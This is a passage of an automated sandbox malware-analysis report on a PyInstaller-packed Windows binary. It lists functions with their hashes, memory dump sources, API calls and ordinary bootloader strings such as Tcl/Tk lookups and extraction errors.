                                                                                                                                                                                                                • Opcode ID: 9a995e5fc84bafd528f225b35c170f98e6cc3b92f214e8a834a3db34d2346d02
                                                                                                                                                                                                                • Instruction ID: 10a585fcc53d8db9bef0508c50a837ab833c09f5d0507259077457b7d249a09e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a995e5fc84bafd528f225b35c170f98e6cc3b92f214e8a834a3db34d2346d02
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA31B433B28B4281E764DF25A44017F6AD5AB84F90F044278EA5DD3BE6DF3CD801AB04
                                                                                                                                                                                                                Function 00007FF67A629F40 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: d9053913a188439c949862f5252d0d96588d6a3198c5220388b8f4d277b857ee
                                                                                                                                                                                                                • Instruction ID: a4c4894426458b3cc688ca4e8af8ddf31aee67a8014021cacd1b26cf46d1d202
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9053913a188439c949862f5252d0d96588d6a3198c5220388b8f4d277b857ee
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAF068B27282558ADB95CF29A81262A7BD0F7487C0F908079E58DC3F14DE3C91519F04
                                                                                                                                                                                                                Function 00007FF67A60C860 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: cfc8547ea6af2cfbec2828df990cd3d0a6205bb3f5e3ae253026f3a9dd74dc92
                                                                                                                                                                                                                • Instruction ID: 27c3c26a3b21d58f2c96bbaff22dc486e8febf35079ef3f60f46b38d3fb241b1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfc8547ea6af2cfbec2828df990cd3d0a6205bb3f5e3ae253026f3a9dd74dc92
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4A00122A28802D0E6849B10A8544772660EB55B00B5001B1D00D814B0AF2CE581A204
                                                                                                                                                                                                                Function 00007FF67A606F00 Relevance: 164.8, APIs: 31, Strings: 63, Instructions: 263libraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc
                                                                                                                                                                                                                • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                • API String ID: 190572456-2208601799
                                                                                                                                                                                                                • Opcode ID: 08011e4291223f8c8b87355f84bdba84e3d11561fc99f88d49761070ad3606f6
                                                                                                                                                                                                                • Instruction ID: 89713d98b32e699cb82e214f5ea46de6ffc36d886c6bfdb737bc86011586b99b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08011e4291223f8c8b87355f84bdba84e3d11561fc99f88d49761070ad3606f6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DAE1DB6BA3EB03D1FA19CF14E85057723A1AF08F40B9454B5C95E863F4EFBCB588A215
                                                                                                                                                                                                                Function 00007FF67A6012B0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 136COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message_fread_nolock
                                                                                                                                                                                                                • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                                                                                                                                                                                • API String ID: 3065259568-2316137593
                                                                                                                                                                                                                • Opcode ID: a9099626a2381055e946f7f7aed1a8ba936185159eed76248da5dffe7bf1f363
                                                                                                                                                                                                                • Instruction ID: 98f0d49c752ed30786ca194df8621016af34360759f63cf3a24c8f31d96d5394
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9099626a2381055e946f7f7aed1a8ba936185159eed76248da5dffe7bf1f363
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D518363A3868746EA24AB21E450AFB6394EF44F84F504071EE4DC7BF5EE7CE585A700
                                                                                                                                                                                                                Function 00007FF67A6023F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                • String ID: P%
                                                                                                                                                                                                                • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                • Opcode ID: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                                                                                                                                                                                • Instruction ID: e1bb2eadb82e4e82d1b4ee7d0520d3e4ace6e86a4ed7499e24a48104e70065b5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E951C326624BA186D6389F36E4581BBB7A1EB98B61F004125EBDE83694DF3CD085DB10
                                                                                                                                                                                                                Function 00007FF67A6168A4 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: -$:$f$p$p
                                                                                                                                                                                                                • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                • Opcode ID: 17c3eaeb34264a701bb66d7ce4ab8a897af2982fe98c3a48157bd34433a5c608
                                                                                                                                                                                                                • Instruction ID: ae6cbc2ae46afe1389905dc6acca2014543bdff72d827b7ac70f99b7ae263f93
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17c3eaeb34264a701bb66d7ce4ab8a897af2982fe98c3a48157bd34433a5c608
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D12E37FE2C24386FB209A14D0546BB7E61EB80F54F844575E68A876E4DF3CE480BB06
                                                                                                                                                                                                                Function 00007FF67A611208 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: f$f$p$p$f
                                                                                                                                                                                                                • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                • Opcode ID: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
                                                                                                                                                                                                                • Instruction ID: 3a575b4e6549feef42dbd453bded59170d2978a5b8b8bfb704dde03e3fb0fdea
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F12B5E3E2D14385FB609A15E0442BFBA51FB40F54F888179E79AC66E4DF3DE480AB50
                                                                                                                                                                                                                Function 00007FF67A6015A0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 99COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                • Opcode ID: 9d56af8893561126369cce298ca858632f1bca0e111e0b68f57014dc206871cc
                                                                                                                                                                                                                • Instruction ID: d5c47ec528b86b7a0957f9aa03db427332a3aecfa460762a7b2204642eb2d122
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d56af8893561126369cce298ca858632f1bca0e111e0b68f57014dc206871cc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22318263B3864346EA24DB51E8509BB63A1EF04FD4F584072DF4D87AA5FE3CE585A700
                                                                                                                                                                                                                Function 00007FF67A60EC00 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                • Opcode ID: 5b2106ab85fd7efcab108e3077ecf48f9db79865e243ba23a6eb4b146be1c4dd
                                                                                                                                                                                                                • Instruction ID: e91c2a6a356c227ebd1d635e4b4a83164e322ddaae32b393a81599a07d25c66e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b2106ab85fd7efcab108e3077ecf48f9db79865e243ba23a6eb4b146be1c4dd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EE18E77A3875586EB209B2594806AF77A4FB44F88F004576EE4D87BA6CF38E5C1D700
                                                                                                                                                                                                                Function 00007FF67A6087B0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF67A60101D), ref: 00007FF67A608847
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF67A60101D), ref: 00007FF67A60889E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharMultiWide
                                                                                                                                                                                                                • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                                • API String ID: 626452242-27947307
                                                                                                                                                                                                                • Opcode ID: 946c277c1fe64d7752950c04badb497d02cc135d75d0a4af96f6f0d747498fb2
                                                                                                                                                                                                                • Instruction ID: 9aa077286b22a75deb2587ca0880d822f6757d50a2602f1a05d9338e16e56d4b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 946c277c1fe64d7752950c04badb497d02cc135d75d0a4af96f6f0d747498fb2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1418F33A28B8282E620DF15B84057BB7A5FB88F90F544575DA8D87BA5EF3CD485E700
                                                                                                                                                                                                                Function 00007FF67A608CF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00007FF67A6039EA), ref: 00007FF67A608D31
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A6029E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF67A6088F2,?,?,?,?,?,?,?,?,?,?,?,00007FF67A60101D), ref: 00007FF67A602A14
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A6029E0: MessageBoxW.USER32 ref: 00007FF67A602AF0
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00007FF67A6039EA), ref: 00007FF67A608DA5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                                • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                                • API String ID: 3723044601-27947307
                                                                                                                                                                                                                • Opcode ID: df8f2b068844af15c3f6e460c074a8b6e33bcf198047290cefaa6cf113e0804d
                                                                                                                                                                                                                • Instruction ID: 223844c5749dc65152a10ce9a91d3541bcb7f0656ddea76ec16d314a1ea945e9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: df8f2b068844af15c3f6e460c074a8b6e33bcf198047290cefaa6cf113e0804d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32216B33A29B42C5EA10DF26E84007B76A1EF94F80B544675CB4D877E5EF3CE541A340
                                                                                                                                                                                                                Function 00007FF67A6075B0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 136COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                                                                                                                                                                                • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                                                                                                                                                                                • API String ID: 3231891352-3501660386
                                                                                                                                                                                                                • Opcode ID: eed310647cf0b76c9ed608e4a94a25af760cd3a9bab53f82cf3118da1903d891
                                                                                                                                                                                                                • Instruction ID: f392ef16bd8ac461b9a71a2c2b897c6a4290688a21bc88e73500a1d30914c7c3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: eed310647cf0b76c9ed608e4a94a25af760cd3a9bab53f82cf3118da1903d891
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE51D467E3DA4346FA51AB25D500ABB66919F84FC0F5400B1EE4DC77F6EE2CE581AB00
                                                                                                                                                                                                                Function 00007FF67A607430 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67A602ABB), ref: 00007FF67A608C1A
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF67A6079B1,00000000,?,00000000,00000000,?,00007FF67A60154F), ref: 00007FF67A60748F
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A602B30: MessageBoxW.USER32 ref: 00007FF67A602C05
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF67A6074EA
                                                                                                                                                                                                                • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF67A607466
                                                                                                                                                                                                                • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF67A6074A3
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
